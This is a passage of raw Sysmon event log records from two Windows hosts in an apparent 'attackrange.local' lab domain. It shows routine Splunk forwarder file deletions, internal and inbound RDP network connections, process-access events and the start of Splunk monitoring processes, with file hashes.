Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E61A064D4F7CCAEF1F6CBCD332BF77BB,SHA256=7D52FCE7D5A8F2461B2D413BE31786678398983F4B15AAEF5538F02F6E09FFAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:38.767{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53391-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:40.596{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=920B9BB2E5716C7181B6AB2793F8FEB4,SHA256=C744057D6A9D17508133EF6C9D68CDC55249B92D93FCCFD0FA4A05358E58A4BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:39.999{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63662-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:41.627{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05771A46E8FD727AB7B910AC281B1933,SHA256=A2E20B0E46CE266E5EB29AC5E68CB7815222A06762347FA905F7DEE6DE465720,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:41.657{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DACB75B37C36FA141861AABCD135BAF,SHA256=C943CE01EE20CCEAE142BCDB176659781BB4C9EB04317DF247BF23E001D7C9B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:38.214{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de54704-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:37.846{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59406-false10.0.1.12-8000- 23542300x80000000000000001050531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:41.611{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1165BC5F4C95A1109ED642B1F20C8FF,SHA256=C11A9B8E25D653A70CC3FC926AED56A56ADD8F08584AF9E26721A633D0DDE967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:41.611{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3BF45AE7D07B425F371D9AF150C4782,SHA256=0DF6E78BE9F03F72FB7E5360E54D5C304AA75D0C67171862EAE9AA45FA227908,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:42.673{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE10663E51F5FCD021885C717F2490DC,SHA256=6C8E3B6A2537D549F91DA07B1BF249E9D4D6B15DC56DF1638FACA2339118FDAE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:42.658{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E0CC2938275AF061913DE2AA7A2C79F,SHA256=450ECFA1F579E913394E60F14DF74D5D2D5B51FBA973996D93F3354310350491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:43.683{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24A49793EAA43680501C6DA20851502D,SHA256=6245A2D26A099570D68E97BD1AA9DC3838054C7D5D59C68A018229A3F63A2F42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:43.675{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B13BE03EAF1E985DCD8291614FE0209,SHA256=FFA5F797560690BB4E3512597378D0D2C84D2C1C4DAFF3D4EE84BD2529543929,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:39.149{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-61782-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:44.699{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66019EE18BC05FACC93FEAD2D71CD1A9,SHA256=BED89192BAFF65AC6956950D23A185DC937677F44313B2698AE568E775919A60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.740{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B81937090850154EAE861A47EC92A67D,SHA256=84BDD099203C5FDF4B9C3E46361F2863B0F36B90EE9933F27E4981236A5DE292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B48-6151-407A-00000000FC01}1280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B48-6151-407A-00000000FC01}1280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.677{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B48-6151-407A-00000000FC01}1280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:44.657{5EBD8912-8B48-6151-407A-00000000FC01}1280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.754{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEB6D2FA38BAC42A9BAD8970033101E0,SHA256=DCA60CD9BE6A8E02BF03307923AD7CA8F09938D0B7C03A5BF67F0343B484D102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:45.715{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9478478F88D6A91F4521878185AB27B2,SHA256=F1FCC13288FCC47728E627A6BE4C913BF663B40C0A413BA6F6D8DE3A982CF68B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.639{5EBD8912-8B49-6151-417A-00000000FC01}42045116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B49-6151-417A-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8B49-6151-417A-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.377{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B49-6151-417A-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.356{5EBD8912-8B49-6151-417A-00000000FC01}4204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:45.292{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1165BC5F4C95A1109ED642B1F20C8FF,SHA256=C11A9B8E25D653A70CC3FC926AED56A56ADD8F08584AF9E26721A633D0DDE967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:13:46.775{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3828C9F234A8A05C37A6FE2D57C27EAE,SHA256=D5F0D5CAB4B6961D6E7374DBB53A08BF3FD3F5A6E8C5B595A326C247CC4924B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:13:46.730{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ABB5CD45134F21584EBD869071EE746,SHA256=1717071A291279AFAFECDEE268A54827AE09F28DAA43AD2B94FDFC5369D168B6,IMPHASH=00000000000000000000000000000000falsetrue 